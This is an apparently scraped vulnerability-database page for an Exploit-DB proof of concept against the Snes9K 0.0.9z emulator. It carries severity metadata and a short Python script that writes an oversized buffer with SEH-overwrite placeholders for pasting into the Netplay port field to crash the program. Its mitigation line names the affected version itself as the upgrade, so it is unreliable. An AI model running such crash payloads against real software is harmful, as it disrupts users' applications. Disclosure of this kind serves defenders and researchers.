header-logo
Suggest Exploit
vendor:
Snes9K
by:
crash_manucoot
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Snes9K
Affected Version From: 0.0.9z
Affected Version To: 0.0.9z
Patch Exists: YES
Related CWE: N/A
CPE: a:snes9k:snes9k:0.0.9z
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Home Premium x86 SPANISH
2018

Snes9K 0.0.9z – Denial of Service (PoC)

A buffer overflow vulnerability exists in Snes9K 0.0.9z, which allows an attacker to cause a denial of service condition by sending a specially crafted payload to the Socket Port Number. This can be exploited by an attacker to crash the application.

Mitigation:

Upgrade to the latest version of Snes9K 0.0.9z
Source

Exploit-DB raw data:

# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC)
# Date: 2018-09-28
# Exploit Author: crash_manucoot
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows 7 Home Premium x86 SPANISH
# Category: Windows Local Exploit
# How to use: open the program go to Netplay-Options-paste the contents of open.txt 
# in the Socket Port Number and Boom 

buffer = "A" * 260
nseh = "B" * 4 
seh = "C" * 4 
junk = "D" * 300

evil = buffer + nseh + seh + junk

file = open('open.txt','w+')
file.write(evil)